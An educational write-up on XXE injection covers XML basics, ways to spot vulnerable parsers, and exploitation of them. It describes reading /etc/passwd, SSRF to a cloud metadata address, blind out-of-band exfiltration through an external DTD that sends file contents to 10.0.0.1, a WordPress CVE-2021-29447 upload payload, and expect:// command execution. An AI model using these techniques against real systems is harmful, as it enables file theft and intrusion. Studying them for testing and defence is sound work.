XXE (XML External Entity)

Vulnerability

By Assim
Twitter @0UN390
Table of Contents
What is XXE ? ....................................................................................................................... 3
Introduction ........................................................................................................................... 3
Impact ................................................................................................................................... 3
XML Basics ........................................................................................................................... 3
XXE Vulnerabilities ............................................................................................................... 6
Finding XXE Vulnerabilities ............................................................................................... 6
Exploiting XXE................................................................................................................... 6
Reading files .................................................................................................................. 6
SSRF ............................................................................................................................. 8
Data Exfiltration via Out-Of-Band ................................................................................... 9
RCE ............................................................................................................................. 12
Labs .................................................................................................................................... 12
References ......................................................................................................................... 13
What is XXE ?
XXE injection attack also known as XML External Entity attack is a type
of attack that is concerned with exploiting the vulnerable XML parsers
in the web applications .
XXE injection has been in the OWASP TOP 10 list as there are a lot of
websites that use XML in the transportation of data.

Introduction
XML External Entity (XXE) is a critical security vulnerability that affects applications
processing XML input. XXE occurs when an application parses XML input that includes
external entities, which can lead to information disclosure, server-side request forgery
(SSRF), out-of-band (OOB) attacks, cross-site scripting (XSS), and even remote code
execution (RCE) some times. In this article, we will delve into XXE vulnerabilities and
explore various examples to understand their impact.

Impact
● Read Files
● Server-Side Request Forgery (SSRF)
● Remote Code Execution (RCE)
● DoS Attack
● Cross-Site Scripting (XSS)

XML Basics
XML (eXtensible Markup Language) is a widely used markup language designed to store
and transport structured data. It provides a flexible and standardized way to describe, store,
and exchange information across different platforms and systems. In this article, we will
explore the fundamental concepts of XML, including the XML declaration, XML elements,
XML DTD (Document Type Definition), internal and external DTDs, and XML entities.

XML Declaration:
The XML declaration is the first line of an XML document and serves to identify the
document as XML. It typically appears as follows:

The declaration starts with `<?xml` and is followed by various attributes. The `version`
attribute specifies the XML version being used (e.g., "1.0"). The `encoding` attribute defines
the character encoding scheme used in the document (e.g., "UTF-8" for Unicode). Additional
attributes like `standalone` can be used to indicate whether the XML document relies on
external resources.

XML Elements:
XML documents are composed of elements, which are the building blocks of the document's
structure. An element consists of a start tag, content, and an end tag. The start tag begins
with a less-than symbol `<`, followed by the element name, and ends with a greater-than
symbol `>`. The end tag has a similar structure but with a forward slash `/` before the
element name. The content lies between the start and end tags.

For example:

In this example, `<book>` is the parent element, containing two child elements `<title>` and
`<author>`. The content of the `<title>` element is "XML Basics," while the content of the
`<author>` element is "Khaled."

XML DTD (Document Type Definition):

A Document Type Definition (DTD) is used to define the structure and constraints of an XML
document. It specifies the elements, attributes, and their relationships within the document.
DTDs can be either internal or external.

Internal DTD:
An internal DTD is declared within the XML document itself, typically placed between the
`<!DOCTYPE>` declaration and the root element. It defines the elements, attributes, entities,
and their relationships.

Example of an internal DTD:

In this example, the internal DTD defines that the root element is `<bookstore>`, which can
contain one or more `<book>` elements. Each `<book>` element should have a `<title>` and
an `<author>` element, both of which can contain character data (`#PCDATA`).
External DTD:
An external DTD is defined in a separate file and referenced within the XML document using
the `SYSTEM` or `PUBLIC` keyword.

Example of an external DTD (books.dtd):

XML document referencing the external DTD:

In this example, the `DOCTYPE` declaration references the external DTD file "books.dtd,"
which contains the element and entity definitions.

XML Entities:
XML entities are used to represent special characters or reusable content within XML
documents. There are two types of entities: character entities and parameter entities.

Character entities represent special characters using predefined entities or user-defined

entities. For example, the `&lt;` entity represents the less-than symbol `<`, and `&amp;`
represents the ampersand `&`.

Parameter entities, on the other hand, are used to define reusable content in DTDs. They
are typically enclosed within `%` symbols.

Example of XML entities:

In this example, the entity `&name;` represents the string "Khaled," which is used within the
`<to>` element. The entity `&greeting;` represents the string "Hello, Khaled!" and is used
within the `<message>` element.
XXE Vulnerabilities
XXE vulnerabilities arise due to the ability of XML processors to process external entities
and include them in the parsed output. External entities are defined in the Document Type
Definition (DTD) or inline within the XML document.

Finding XXE Vulnerabilities

● Use a proxy like Burp and intercept requests and responses and search for XML-like
documents. Like "<?xml" string.
● Decode suspicious blocks of data to identify encoded XML.
● Look for file-upload features as XML forms the basis of many common file types.
● Explore endpoints where the application accepts XML data by default. Modify the
Content-Type header to "text/xml" or "application/xml" and include XML data in the
request body.
● Try to parse XML in different ways.
● Try Basic XXE to retrieve files.
● Try XXE to SSRF
● Try Blind XXE

Exploiting XXE

Reading files

Here we started by noticing the xml parameter in the request that takes XML, which might be
vulnerable to XXE
So, I will try to parse XML to test it:

same thing with burp suite

Now as I found it vulnerable to XXE let's try to exploit it by retrieving the /etc/passwd using
the following payload:

looking at this we see "&xxe;" entity reference used in the <com> element. This entity
reference is defined in the <!ENTITY> declaration as reading the contents of the
"/etc/passwd" file. It means that the XML code is trying to read the contents of the
"/etc/passwd" file and include it in the <com> element.
So, I did this using burp suite and it retrieved the /etc/passwd file:

also Instead of doing this:

You can try to do it with base 64 like this:

SSRF
You can also exploit XXE using SSRF, for example, here there is an XML in the request
page, which might be vulnerable to XXE. As we can see there is a simple XML code that
represents a stock check request. It contains information about a product and a store. The
<productId> element has a value of "2" and the <storeId> element has a value of "1". This
XML code is used to send a request to check the stock availability of a specific product at a
store.
Next, we can exploit it with SSRF, and as you can see this is an XML code that is similar to
the previous example but with an additional part called the "DOCTYPE" declaration. The
important part is the "&xxe" entity reference used in the <productId> element. In this case,
the entity reference is defined to fetch data from a specific IP address (169.254.169.254)
using the "http" protocol. Which attempt to access sensitive information or interact with a
specific server:

by exploiting SSRF we can access files on servers or scan internal devices on the network
or scan ports.

Data Exfiltration via Out-Of-Band

from this article, we can try to do data exfiltration via out-of-band:
https://exploit-notes.hdks.org/exploit/web/security-risk/blind-xxe/
looking at the first part which is creating a DTD:

The first line starts with "<!ENTITY % file SYSTEM "file:///etc/passwd">". It defines an entity
named "file" that points to the "/etc/passwd" file on the system.
The second line is commented out with "<!--" and "<!-->". It suggests an alternative way to
define the "file" entity using PHP filters to base64-encode the contents of the "index.php" file.
PHP filters allow manipulating data streams in PHP.

The third line defines an entity named "eval" that contains an XML entity declaration. It
declares another entity named "exfiltrate" that points to a specific URL
("http://10.0.0.1/?x=%file;") with the value of the "file" entity appended as a parameter.

The fourth line "%eval;" references the "eval" entity, which triggers the evaluation of the
"eval" entity declaration.

The fifth line "%exfiltrate;" references the "exfiltrate" entity, which triggers the execution of
the URL specified in the "eval" entity.

then we got:

which is a Python server that you can implement to receive a connection, you can also do
that with Burp Collaborator.

moving to the next part which is inserting XXE

Now this code defines a "DOCTYPE" section in XML. Inside this section, there is an entity
called "xxe" that is assigned the value of an external resource located at
"http://10.0.0.1/exploit.dtd". The "%xxe;" part references and uses this entity. Essentially, it
allows the XML document to include and utilize content from the specified external resource.

WordPress CVE
here I would implement the previous concept on WordPress: CVE-2021-29447 but it would
be a little different
starting with the dashboard you can notice that there is an upload functionality:

so, let's write our DTD as we explained earlier

now let's make a payload.wav to upload it later with the content you see, which will be the
same as the insert phase previously, but here we have an upload functionality so it's a little
different :

now running our Python server in the same path:

uploading our exploit:

now as you can see, we received the /etc/passwd file but in base64
so now let's decode it to get the content:

RCE
Sometimes we can use the the expect://id if the "expect" is used, which is a feature specific
to certain XML parsers that allows executing arbitrary commands or retrieving sensitive
information from the server.

Labs
• portswigger.net/web-security/xxe
• https://www.vulnhub.com/entry/xxe-lab-1,254/
• https://tryhackme.com/room/mustacchio
• https://tryhackme.com/room/wordpresscve202129447
References
1. World Wide Web Consortium (W3C) Recommendation - Extensible Markup
Language (XML): w3.org/TR/xml
2. W3Schools - XML Tutorial: w3schools.com/xml
3. Mozilla Developer Network (MDN) - XML
Introduction: https://developer.mozilla.org/en-US/docs/Web/XML/XML_introduction
4. OWASP - XML External Entity (XXE) Prevention Cheat
Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Preven
tion_Cheat_Sheet.html
5. GitHub - XXE/README.md: github.com/AfvanMoopen/tryhackme-
/blob/master/XXE/README.md
6. HackerOne Report: hackerone.com/reports/347139
7. InfoSec Write-ups - Thick Client Pentest, Out-of-band XXE, Bug Hunting
Resources: infosecwriteups.com/thick-client-pentest-out-of-band-xxe-bug-hunting-
resources-rdp-logontypes-powershell-2363bc3c7752
8. XML External Entity (XXE)
Processing: owasp.org/XML_External_Entity_(XXE)_Processing
9. XML Security Cheat
Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.
html
10. XML External Entity (XXE) Injection in Web App Penetration
Testing: cyberw1ng.medium.com/xml-external-entity-xxe-injection-in-web-app-
penetration-testing-2023-3eaa79b32c82
11. CVE-2022-42710: A Journey Through XXE to Stored XSS: infosecwriteups.com/cve-
2022-42710-a-journey-through-xxe-to-stored-xss-851d74dfe917
12. Exploiting Out-of-Band XXE in the Wild: 0xmahmoudjo0.medium.com/exploiting-out-
of-band-xxe-in-the-wild-16fc6dad9ee2
13. Exploit Notes - Blind XXE: exploit-notes.hdks.org/exploit/web/security-risk/blind-xxe/
14. XML External Entity (XXE) - Web Attacks: www.pwny.cc/web-attacks/xml-external-
entity-xxe
15. PortSwigger - XML External Entity (XXE): portswigger.net/web-security/xxe